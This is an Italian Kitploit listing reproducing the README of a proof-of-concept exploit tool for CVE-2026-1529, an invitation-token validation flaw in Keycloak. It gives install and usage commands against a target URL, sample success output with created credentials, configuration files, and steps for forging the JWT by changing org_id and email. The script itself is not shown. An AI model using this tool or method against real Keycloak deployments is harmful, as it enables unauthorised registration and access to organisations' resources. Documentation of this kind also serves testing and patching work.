Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation — CVE-2026-1529 (PoC) è una vulnerabilità critica in Keycloak che consente la registrazione non autorizzata in organizzazioni tramite una validazione impropria del token di invito. Questo strumento di exploit dimostra la vulnerabilità manipolando i token JWT per registrare utenti in organizzazioni non autorizzate. | Kitploit
Strumenti/GitHubGitHub/ninjazan420/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed Teaming
GitHubninjazan420/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation

Vedi Repository
6 mesi faNon ancora revisionato

Informazioni

CVE-2026-1529 (PoC) è una vulnerabilità critica in Keycloak che consente la registrazione non autorizzata in organizzazioni tramite una validazione impropria del token di invito. Questo strumento di exploit dimostra la vulnerabilità manipolando i token JWT per registrare utenti in organizzazioni non autorizzate.

Condividi

CVE-2026-1529 Strumento di exploit per Keycloak

Keycloak: registrazione non autorizzata in organizzazioni tramite una validazione non corretta del token di invito


Esclusione di responsabilità

Questo strumento è destinato esclusivamente a scopi educativi e di test di sicurezza. Utilizzalo solo su sistemi per cui disponi di un'autorizzazione esplicita al test. L'accesso non autorizzato a sistemi informatici è illegale e contrario all'etica. Gli autori di questo strumento non sono responsabili di eventuali usi impropri o danni causati da questo software.

Creato da: f3ds cr3w est, 2002


Panoramica

CVE-2026-1529 è una vulnerabilità critica in Keycloak che consente la registrazione non autorizzata in organizzazioni tramite una validazione non corretta del token di invito. Questo strumento di exploit dimostra la vulnerabilità manipolando i token JWT per registrare utenti in organizzazioni non autorizzate.

Dettagli tecnici

  • ID CVE: CVE-2026-1529
  • Software interessato: Keycloak (org.keycloak.services.resources.organizations)
  • Punteggio CVSS: 8.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
  • Vettore di attacco: Rete
  • Complessità dell'attacco: Bassa
  • Impatto: Accesso non autorizzato alle risorse dell'organizzazione

Descrizione della vulnerabilità

La vulnerabilità risiede nel processo di validazione dei token JWT per gli inviti alle organizzazioni. Gli attaccanti possono manipolare i campi org_id ed email nel payload JWT, consentendo loro di registrare utenti in qualsiasi organizzazione senza un'adeguata autorizzazione.


Installazione

Prerequisiti

  • Python 3.7 o superiore
  • gestore di pacchetti pip

Configurazione

  1. Clona o scarica lo strumento di exploit:
root@kitploit:~
git clone https://github.com/ninjazan420/CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation
cd CVE-2026-1529-POC
  1. Installa le dipendenze richieste:
root@kitploit:~
pip install -r requirements.txt
  1. Rendi eseguibile lo script di exploit:
root@kitploit:~
chmod +x keycloak-exploit.py

Utilizzo

Utilizzo di base

root@kitploit:~
# Standard usage with target URL
python keycloak-exploit.py https://target-keycloak.com

# Show help
python keycloak-exploit.py -h

# Show version
python keycloak-exploit.py -v

Utilizzo avanzato

root@kitploit:~
# Use custom invitation token
python keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 https://target-keycloak.com

# Use custom organization ID
python keycloak-exploit.py -o custom_org_id https://target-keycloak.com

# Use custom configuration file
python keycloak-exploit.py -c custom_config.json https://target-keycloak.com

# Enable debug logging
python keycloak-exploit.py -d https://target-keycloak.com

Opzioni della riga di comando


Output

Exploit riuscito

Quando l'exploit riesce, vedrai un output simile a:

root@kitploit:~
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✓ Target is vulnerable to CVE-2026-1529

🎯 EXPLOIT SUCCESSFUL!
Username: admin_user_2026
Password: KeycloakCVE2026!
Email: [email protected]
Login Link: https://target-keycloak.com/realms/master/account

📄 Report saved to: output/reports/exploit_report_20260210_134556.txt

🔐 Use the provided credentials to access the Keycloak instance!
⚠️  This demonstrates unauthorized access due to CVE-2026-1529

=============================================================
by f3ds cr3w est, 2002
=============================================================

Exploit fallito

Se l'exploit fallisce, vedrai:

root@kitploit:~
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✗ Target is not vulnerable

❌ EXPLOIT FAILED!
Check logs for details: logs/exploit.log

Struttura del progetto

root@kitploit:~
CVE-2026-1529-POC/
├── keycloak-exploit.py          # Main exploit script
├── requirements.txt             # Python dependencies
├── README.md                   # This file
├── config/
│   └── default_config.json     # Default configuration
├── utils/
│   ├── jwt_utils.py            # JWT manipulation utilities
│   ├── http_utils.py           # HTTP client utilities
│   └── crypto_utils.py         # Cryptographic utilities
├── output/
│   ├── logs/                   # Log files
│   └── reports/                # Exploit reports

Configurazione

Configurazione predefinita

Lo strumento utilizza un file di configurazione predefinito (config/default_config.json) con le seguenti impostazioni:

root@kitploit:~
{
  "exploit": {
    "default_username": "admin_user_2026",
    "default_password": "KeycloakCVE2026!",
    "default_email": "[email protected]",
    "timeout": 30,
    "max_retries": 3
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "keycloak-cve-2026-1529-exploit",
    "token_expiry": 3600
  },
  "target": {
    "endpoints": {
      "realms": "/realms",
      "organizations": "/organizations",
      "register": "/register",
      "login": "/login"
    }
  },
  "output": {
    "log_level": "INFO",
    "save_reports": true,
    "report_format": "txt"
  }
}

Configurazione personalizzata

Puoi creare un file di configurazione personalizzato e utilizzarlo con l'opzione -c:

root@kitploit:~
{
  "exploit": {
    "default_username": "custom_user",
    "default_password": "CustomPassword123!",
    "default_email": "[email protected]",
    "timeout": 60,
    "max_retries": 5
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "custom-secret-key",
    "token_expiry": 7200
  }
}

Dettagli tecnici

Processo di exploit

  1. Analisi del target: verifica se il target è un'istanza Keycloak vulnerabile
  2. Generazione del token: genera o utilizza un token di invito personalizzato
  3. Manipolazione del token: manipola il payload JWT per modificare l'ID dell'organizzazione
  4. Registrazione dell'utente: registra un utente utilizzando il token manipolato
  5. Test di accesso: verifica che l'utente creato possa accedere
  6. Generazione del report: crea un report dettagliato dell'exploit

Manipolazione del JWT

Lo strumento sfrutta la validazione JWT non corretta:

  1. Decodificando il token JWT senza verifica della firma
  2. Modificando il campo org_id per puntare a un'organizzazione diversa
  3. Modificando il campo email se necessario
  4. Ricodificando il token con il payload manipolato

Considerazioni sulla sicurezza

  • Lo strumento utilizza una corretta gestione degli errori e la registrazione dei log
  • Tutte le richieste di rete includono header appropriati
  • La validazione degli input viene eseguita su tutti gli input dell'utente
  • Lo strumento rispetta i codici di risposta del server del target

Risoluzione dei problemi

Problemi comuni

  1. Errori di connessione

    • Verifica che l'URL del target sia accessibile
    • Verifica che il target sia un'istanza Keycloak
    • Controlla la connettività di rete e le impostazioni del firewall
  2. Errori di validazione del token

    • Assicurati che il formato del token sia corretto
    • Controlla che il token contenga i campi richiesti (org_id, email, invitation_type)
    • Verifica che il token non sia scaduto
  3. Errori di registrazione

    • Verifica che l'endpoint di registrazione sia accessibile
    • Verifica il formato del token manipolato
    • Controlla se il target ha la registrazione delle organizzazioni abilitata

Modalità di debug

Abilita i log di debug per una risoluzione dei problemi dettagliata:

root@kitploit:~
python keycloak-exploit.py -d https://target-keycloak.com

File di log

  • Log principale: logs/exploit.log
  • Report: output/reports/exploit_report_YYYYMMDD_HHMMSS.txt

Metodologia di test

Valutazione della vulnerabilità

Lo strumento esegue i seguenti controlli:

  1. Controllo di integrità: verifica che il target sia un'istanza Keycloak
  2. Rilevamento della versione: tenta di rilevare la versione di Keycloak
  3. Test degli endpoint: testa gli endpoint relativi alle organizzazioni
  4. Validazione del token: valida la struttura del token JWT

Validazione dell'exploit

L'exploit è considerato riuscito se:

  1. Il target è vulnerabile
  2. Un utente può essere registrato utilizzando il token manipolato
  3. L'utente registrato può accedere con successo
  4. Viene generato un link di accesso valido

Buone pratiche di sicurezza

Per le organizzazioni

  1. Applica le patch: aggiorna all'ultima versione di Keycloak
  2. Validazione del token: implementa una corretta verifica della firma JWT
  3. Controllo degli accessi: limita la registrazione nelle organizzazioni agli utenti autorizzati
  4. Monitoraggio: monitora le attività di registrazione sospette
  5. Sicurezza di rete: implementa regole firewall adeguate

Per i ricercatori di sicurezza

  1. Autorizzazione: testa solo i sistemi per cui hai il permesso di eseguire test
  2. Divulgazione responsabile: segnala le vulnerabilità ai fornitori
  3. Documentazione: conserva registrazioni dettagliate dei tuoi test
  4. Test etici: segui pratiche di divulgazione responsabile

Licenza

Questo strumento è fornito esclusivamente a scopo educativo e di test di sicurezza. Utilizzalo a tuo rischio.

Creato da: f3ds cr3w est, 2002

Contatti: per domande o feedback, fai riferimento al repository del progetto.


Changelog

Versione 1.0

  • Versione iniziale
  • Funzionalità di base dell'exploit
  • Capacità di manipolazione JWT
  • Generazione di report
  • Interfaccia a riga di comando

🙏 Ringraziamenti

  • Team di sviluppo di Keycloak
  • Ricercatori di sicurezza che hanno scoperto CVE-2026-1529
  • La community open-source della sicurezza

Ricorda: da grandi poteri derivano grandi responsabilità. Usa questo strumento con saggezza ed etica.

di f3ds cr3w est, 2002

Scarica lo strumento
OpzioneDescrizioneObbligatoria
targetURL Keycloak di destinazione (IP o dominio)Sì
-t, --tokenToken di invito personalizzato da utilizzareNo
-o, --org-idID organizzazione personalizzatoNo
-c, --configPercorso del file di configurazioneNo
-d, --debugAbilita i log di debugNo
-v, --versionMostra le informazioni sulla versioneNo
-h, --helpMostra il messaggio di aiutoNo